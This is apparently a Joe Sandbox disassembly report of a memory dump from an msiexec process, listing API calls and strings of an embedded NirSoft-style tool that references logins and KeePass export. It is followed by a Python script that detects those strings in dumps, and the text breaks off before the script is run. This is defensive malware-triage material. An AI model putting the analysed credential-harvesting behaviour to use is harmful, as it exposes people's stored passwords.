                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                            • String ID: logins$null
                                                                                            • API String ID: 2148543256-2163367763
                                                                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • memset.MSVCRT ref: 004085CF
                                                                                            • memset.MSVCRT ref: 004085F1
                                                                                            • memset.MSVCRT ref: 00408606
                                                                                            • strcmp.MSVCRT ref: 00408645
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                            • memset.MSVCRT ref: 0040870E
                                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                            • String ID: ---
                                                                                            • API String ID: 3437578500-2854292027
                                                                                            • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                            • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041087D
                                                                                            • memset.MSVCRT ref: 00410892
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1010922700-0
                                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                            APIs
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                            • malloc.MSVCRT ref: 004186B7
                                                                                            • free.MSVCRT ref: 004186C7
                                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                            • free.MSVCRT ref: 004186E0
                                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                            • malloc.MSVCRT ref: 004186FE
                                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                            • free.MSVCRT ref: 00418716
                                                                                            • free.MSVCRT ref: 0041872A
                                                                                            • free.MSVCRT ref: 00418749
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                                            • String ID: |A
                                                                                            • API String ID: 3356672799-1717621600
                                                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                            • API String ID: 2081463915-1959339147
                                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2012295524-70141382
                                                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                            • API String ID: 667068680-3953557276
                                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1700100422-0
                                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                            • String ID:
                                                                                            • API String ID: 552707033-0
                                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: %%0.%df
                                                                                            • API String ID: 3473751417-763548558
                                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                            • String ID: A
                                                                                            • API String ID: 2892645895-3554254475
                                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                            APIs
                                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                            • memset.MSVCRT ref: 0040DA23
                                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                            • String ID: caption
                                                                                            • API String ID: 973020956-4135340389
                                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                            Strings
                                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                            • API String ID: 1283228442-2366825230
                                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00413972
                                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                                            • memset.MSVCRT ref: 004139B8
                                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                            • memset.MSVCRT ref: 00413A00
                                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                            • String ID: \systemroot
                                                                                            • API String ID: 4173585201-1821301763
                                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy
                                                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                            • API String ID: 1284135714-318151290
                                                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
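The two function summaries above expose string sets that are useful for triaging other dumps: the wide-string function at 00410A70..00410B3C carries the NirSoft HTML report template (DOCTYPE, meta charset, the "nirsoft.net" link and the RTL table fragment), and the wcscpy-only function carries the value names of the Explorer "Shell Folders" registry key (AppData, Desktop, Favorites, Startup and so on), which the tool uses to locate profile directories. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it scans a raw memory dump for both string sets in UTF-16LE (the encoding implied by the _snwprintf/wcscpy calls) and in ASCII, and reports offsets plus a rough verdict. The dump bytes are constructed inline, and the verdict thresholds are an assumption chosen for illustration, not a tested detection rule.

```python
"""Memory-dump string triage for the NirSoft-style report/profile strings listed above."""
import re

# Strings taken from the String ID fields of the two function summaries above.
# The report-template function calls _snwprintf/wcscpy, so these are wide strings.
NIRSOFT_HTML_MARKERS = (
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
    '<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>',
    "<meta http-equiv='content-type' content='text/html;charset=%s'>",
    '<table dir="rtl"><tr><td>',
)
# Value names under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders.
SHELL_FOLDER_NAMES = (
    "AppData", "Common Desktop", "Common Programs", "Common Start Menu",
    "Common Startup", "Desktop", "Favorites", "Programs", "Start Menu", "Startup",
)


def encodings(text):
    """Both byte forms a wide-string tool can leave in memory."""
    return {"utf-16le": text.encode("utf-16le"), "ascii": text.encode("ascii")}


def find_markers(blob, markers):
    """Return {marker: [(encoding, offset), ...]} for every occurrence in blob."""
    hits = {}
    for marker in markers:
        for enc, needle in encodings(marker).items():
            for match in re.finditer(re.escape(needle), blob):
                hits.setdefault(marker, []).append((enc, match.start()))
    return hits


def triage(blob):
    """Scan one dump; the verdict rule (2+ template fragments and AppData) is an assumed heuristic."""
    html = find_markers(blob, NIRSOFT_HTML_MARKERS)
    folders = find_markers(blob, SHELL_FOLDER_NAMES)
    verdict = (
        "nirsoft-report-template-present"
        if len(html) >= 2 and "AppData" in folders
        else "inconclusive"
    )
    return {"html_markers": html, "shell_folders": folders, "verdict": verdict}


# Constructed sample dump (not bytes from the analysed process): a zero-filled
# header, a few UTF-16LE strings separated by NUL terminators and filler bytes,
# and one ASCII copy of the table fragment to show both encodings being caught.
SAMPLE_DUMP = b"\x00" * 64
for _s in NIRSOFT_HTML_MARKERS[:3] + ("AppData", "Start Menu"):
    SAMPLE_DUMP += _s.encode("utf-16le") + b"\x00\x00" + b"\x90" * 7
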